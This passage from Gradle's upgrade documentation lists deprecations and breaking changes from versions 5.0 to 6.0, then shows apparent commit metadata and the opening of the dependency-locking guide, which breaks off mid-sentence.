<<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. 
`testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n=== Potential breaking changes\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful to maintain executing build no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will result the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\n[Gradle Module Metadata](https:\/\/blog.gradle.org\/gradle-metadata-1.0), officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`) which usually also does not exist.\nThis often caused large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:repository-content-filtering,repository content filter>>.\n\n==== `@Nullable` annotation is 
gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Task validation changes\n\n- `ValidateTaskProperties.setClasses()` is now removed. Use `getClasses().setFrom()` instead.\n- `ValidateTaskProperties.setClasspath()` is now removed. use `getClasspath().setFrom()` instead.\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\nMiscellaneous::\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. 
There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. 
Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== BuildSrc usage in Gradle settings\n\nAccess to the buildSrc project and its dependencies in gradle settings scripts is now deprecated.\nThis is due to plans to make initialization of gradle builds more efficient.\n\nThis will become an error in Gradle 6.0.\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. 
These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. 
This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. 
This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. 
Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do 
==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved POM support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail, since they would create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error-prone, so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n
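A minimal sketch of the new default (the property name is illustrative):\n\n```\n\/\/ in a plugin or build script, using the project's ObjectFactory\ndef labels = project.objects.listProperty(String)\nprintln labels.get() \/\/ prints [] instead of failing with a missing-value error\nlabels.add('alpha') \/\/ values can be appended without setting an initial value first\n```\n\n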
==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follows the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions is no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties, and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n\n===== Archive tasks fail on duplicate files\n\nUntil now, archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as the default.\n\n
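Conversely, if you want a `Copy` task to reject duplicates ahead of the Gradle 6.0 change, you can opt in explicitly. A minimal sketch (the task name and paths are illustrative):\n\n```\ntask mergeResources(type: Copy) {\n duplicatesStrategy = DuplicatesStrategy.FAIL \/\/ opt in; INCLUDE stays the default for Copy\n from 'src\/main\/resources'\n from 'src\/extra\/resources'\n into 'build\/merged-resources'\n}\n```\n\n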
\n\/\/\/\/\n== Changes in detail\n\n[[rel5.X:title]]\n=== [5.X] Title\n\nDetails...\n\/\/\/\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67f3093873ab1ca8ef8d28c0dd9a75bfffa64d41","subject":"Improve single lockfile per project documentation","message":"Improve single lockfile per project documentation\n\nIssue 
#12450\n","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/02-declaring-dependency-versions\/dependency_locking.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/02-declaring-dependency-versions\/dependency_locking.adoc","new_contents":"[[dependency-locking]]\n= Locking dependency versions\n\nUse of dynamic dependency versions (e.g. `1.+` or `[1.0,2.0)`) makes builds non-deterministic.\nThis causes builds to break without any obvious change, and worse, can be caused by a transitive dependency that the build author has no control over.\n\nTo achieve https:\/\/reproducible-builds.org\/[reproducible builds], it is necessary to _lock_ versions of dependencies and transitive dependencies such that a build with the same inputs will always resolve the same module versions.\nThis is called _dependency locking_.\n\nIt enables, amongst others, the following scenarios:\n\n* Companies dealing with multiple repositories no longer need to rely on `-SNAPSHOT` or changing dependencies,\na practice which sometimes results in cascading failures when a dependency introduces a bug or incompatibility.\nNow dependencies can be declared against a major or minor version range, making it possible to test with the latest versions on CI while leveraging locking for stable developer builds.\n* Teams that want to always use the latest of their dependencies can use dynamic versions, locking their dependencies only for releases.\nThe release tag will contain the lock states, allowing that build to be fully reproducible when bug fixes need to be developed.\n\nCombined with <<publishing_maven.adoc#publishing_maven:resolved_dependencies,publishing resolved versions>>, you can also replace the declared dynamic version part at publication time.\nConsumers will instead see the versions that your release resolved.\n\nLocking is enabled per <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration>>.\nOnce enabled, you must create an initial lock state.\nCreating it causes Gradle to verify that resolution results do not change, resulting in the same selected dependencies even if newer versions are produced.\nModifications to your build that would impact the resolved set of dependencies will cause the build to fail.\nThis makes sure that changes, either in published dependencies or build definitions, do not alter resolution without adapting the lock state.\n\n[NOTE]\n====\nDependency locking makes sense only with <<dynamic_versions.adoc#sub:declaring_dependency_with_dynamic_version,dynamic versions>>.\nIt will have no impact on <<dynamic_versions.adoc#sub:declaring_dependency_with_changing_version,changing versions>> (like `-SNAPSHOT`) whose coordinates remain the same, though the content may change.\nGradle will even emit a warning when persisting lock state and changing dependencies are present in the resolution result.\n====\n\n== Enabling locking on configurations\n\nLocking of a configuration happens through the link:{groovyDslPath}\/org.gradle.api.artifacts.ResolutionStrategy.html[ResolutionStrategy]:\n\n.Locking a specific configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\n
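For illustration, a minimal Groovy DSL sketch of what enabling locking on one configuration can look like (the configuration name is illustrative):\n\n```\nconfigurations {\n compileClasspath {\n resolutionStrategy.activateDependencyLocking()\n }\n}\n```\n\n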
Or the following, as a way to lock all configurations:\n\n.Locking all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=locking-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=locking-all]\"]\n====\n\n[NOTE]\n====\nOnly configurations that can be resolved will have lock state attached to them.\nApplying locking on non-resolvable configurations is simply a no-op.\n====\n\n[NOTE]\n====\nThe above will lock all _project_ configurations, but not the _buildscript_ ones.\n====\n\nYou can also disable locking on a specific configuration.\nThis can be useful if a plugin configured locking on all configurations but you happen to add one that should not be locked.\n\n.Unlocking a specific 